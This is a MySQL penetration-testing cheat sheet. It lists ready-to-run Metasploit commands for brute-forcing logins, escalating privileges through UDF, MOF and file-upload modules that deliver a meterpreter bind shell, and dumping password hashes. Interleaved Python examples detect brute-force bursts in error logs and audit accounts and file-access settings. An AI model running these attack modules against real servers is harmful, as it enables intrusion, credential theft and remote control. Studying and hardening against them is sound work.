metasploit-mysql
Penetration testing MySQL falls into two situations: a MySQL service exposed on the public internet, and a MySQL service inside an internal network. An externally exposed service is of course easier to reach and more convenient to test, so the steps below, written for an internal MySQL service, basically apply to the external case as well.
Discovering the MySQL service
- Scan port 3306 with nmap to determine whether it is open
- Fingerprint the MySQL service with the msf module auxiliary/scanner/mysql/mysql_version
- Look for web-facing MySQL administration front ends that may exist, such as phpMyAdmin
Obtaining MySQL credentials
- Log in directly with a weak password
- Brute force
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.2
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
set STOP_ON_SUCCESS true
set THREADS 20
exploit
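From the defender's side, the mysql_login run above produces a burst of rejected logins, which MySQL writes to its error log as "Access denied for user ..." entries (provided the error-log verbosity is set to record them: log_warnings on 5.7, log_error_verbosity on 8.0). The following script is an added example, not part of the original note, that parses such lines and raises an alert when one source host accumulates a threshold of failures inside a sliding time window; the log lines are constructed in the style of the MySQL error log, not captured from a real server.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of the MySQL error log (not from a real server).
SAMPLE_LOG = """\
2024-03-01T10:00:00.000000Z 12 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2024-03-01T10:00:01.000000Z 13 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2024-03-01T10:00:01.500000Z 14 [Note] Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2024-03-01T10:00:02.000000Z 15 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2024-03-01T10:00:02.500000Z 16 [Note] Access denied for user 'mysql'@'192.168.1.50' (using password: YES)
2024-03-01T10:00:03.000000Z 17 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2024-03-01T10:30:00.000000Z 40 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
2024-03-01T11:00:00.000000Z 41 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
"""

# Timestamp, connection id, log level, then the access-denied message with user and source host.
DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)'"
)


def parse_denials(text):
    """Yield (timestamp, user, source_host) for every access-denied line in the log text."""
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
        yield ts, m.group("user"), m.group("host")


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per source host that reaches `threshold` failures inside `window`.

    Each alert records the host, the number of failures in the triggering window and the
    distinct user names tried; several user names from one host points to password
    spraying rather than guessing against a single account.
    """
    by_host = defaultdict(list)
    for ts, user, host in parse_denials(text):
        by_host[host].append((ts, user))

    alerts = []
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = {u for _, u in events[start:end + 1]}
                alerts.append({"host": host, "failures": end - start + 1, "users": sorted(users)})
                break  # one alert per host is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f"{alert['host']}: {alert['failures']} failures, users tried: {alert['users']}")
```

In the constructed sample, 192.168.1.50 trips the threshold within a few seconds across three user names, while 10.0.0.7 (two failures half an hour apart) does not. On a real host, point the script at the error log path from SHOW VARIABLES LIKE 'log_error' and tune threshold and window to the normal failure rate of your applications.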
MySQL privilege escalation
UDF privilege escalation
use exploit/multi/mysql/mysql_udf_payload
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set target 0
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
MOF privilege escalation
use exploit/windows/mysql/mysql_mof
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
Upload a file and execute it
use exploit/windows/mysql/scrutinizer_upload_exec
set RHOST 192.168.1.2
set USERNAME root
set PASSWORD 123456
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.1.2
set LPORT 4444
exploit
Dumping the mysql.user hashes
Querying the mysql.user table directly with a SQL statement is the recommended approach; the module below automates the same query.
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS 192.168.1.2
set USERNAME root
set PASSWORD 123456
set THREADS 20
exploit
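The three escalation modules above (UDF, MOF, file upload) all depend on the database account being able to write files on the server, which the FILE privilege grants and secure_file_priv constrains, and the hashdump module depends on the attacker already holding a usable password. The following audit script is an added example, not part of the original note, that checks both preconditions offline against rows exported from mysql.user and from SHOW VARIABLES: remote accounts holding FILE, wildcard hosts, empty passwords, mysql_native_password hashes matching a small weak-password list (the hash format, '*' followed by the upper-case hex of SHA1(SHA1(password)), is MySQL's documented scheme), an unrestricted secure_file_priv and an enabled local_infile. The rows and variables are constructed sample data, and the finding codes are names chosen for this example.

```python
import hashlib

# Hosts that cannot be reached over the network; FILE on these is less exposed.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def native_password_hash(password):
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_accounts(users, weak_passwords):
    """Return (finding_code, 'user@host') tuples for risky rows of mysql.user."""
    findings = []
    weak = {native_password_hash(p): p for p in weak_passwords}
    for u in users:
        acct = f"{u['User']}@{u['Host']}"
        # FILE lets the account write files server-side: the precondition for UDF/MOF drops.
        if u["File_priv"] == "Y" and u["Host"] not in LOCAL_HOSTS:
            findings.append(("FILE_PRIV_REMOTE", acct))
        if u["Host"] == "%":
            findings.append(("WILDCARD_HOST", acct))
        if u["authentication_string"] == "":
            findings.append(("EMPTY_PASSWORD", acct))
        elif u["plugin"] == "mysql_native_password" and u["authentication_string"] in weak:
            findings.append(("WEAK_PASSWORD", acct))
    return findings


def audit_variables(variables):
    """Return findings for server variables that widen file access."""
    findings = []
    # Empty string means SELECT ... INTO OUTFILE / LOAD_FILE may touch any path;
    # NULL disables them entirely and a directory restricts them to that directory.
    if variables.get("secure_file_priv", "") == "":
        findings.append(("SECURE_FILE_PRIV_UNRESTRICTED", "secure_file_priv"))
    if str(variables.get("local_infile", "OFF")).upper() == "ON":
        findings.append(("LOCAL_INFILE_ENABLED", "local_infile"))
    return findings


def audit(users, variables, weak_passwords=("123456", "root", "password")):
    """Combine account and variable checks into one sorted list of findings."""
    return sorted(audit_accounts(users, weak_passwords) + audit_variables(variables))


# Constructed sample data standing in for
#   SELECT User, Host, plugin, authentication_string, File_priv, Super_priv FROM mysql.user;
# and for SHOW VARIABLES. The caching_sha2 strings are placeholders, not real hashes.
SAMPLE_USERS = [
    {"User": "root", "Host": "localhost", "plugin": "caching_sha2_password",
     "authentication_string": "$A$005$<constructed placeholder>", "File_priv": "Y", "Super_priv": "Y"},
    {"User": "root", "Host": "%", "plugin": "mysql_native_password",
     "authentication_string": native_password_hash("123456"), "File_priv": "Y", "Super_priv": "Y"},
    {"User": "app", "Host": "10.0.0.%", "plugin": "mysql_native_password",
     "authentication_string": "", "File_priv": "N", "Super_priv": "N"},
    {"User": "report", "Host": "10.0.0.5", "plugin": "caching_sha2_password",
     "authentication_string": "$A$005$<constructed placeholder>", "File_priv": "N", "Super_priv": "N"},
]
SAMPLE_VARS = {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/", "local_infile": "ON"}


if __name__ == "__main__":
    for code, subject in audit(SAMPLE_USERS, SAMPLE_VARS):
        print(f"{code:32} {subject}")
```

Each finding maps to a remediation on the server: REVOKE FILE from any account that does not need it, replace '%' hosts with the actual client addresses, rotate empty or weak passwords, set secure_file_priv to a dedicated directory (or NULL) and local_infile=0 in my.cnf. The weak-password check only covers mysql_native_password hashes, because caching_sha2_password hashes are salted and cannot be matched by a simple lookup.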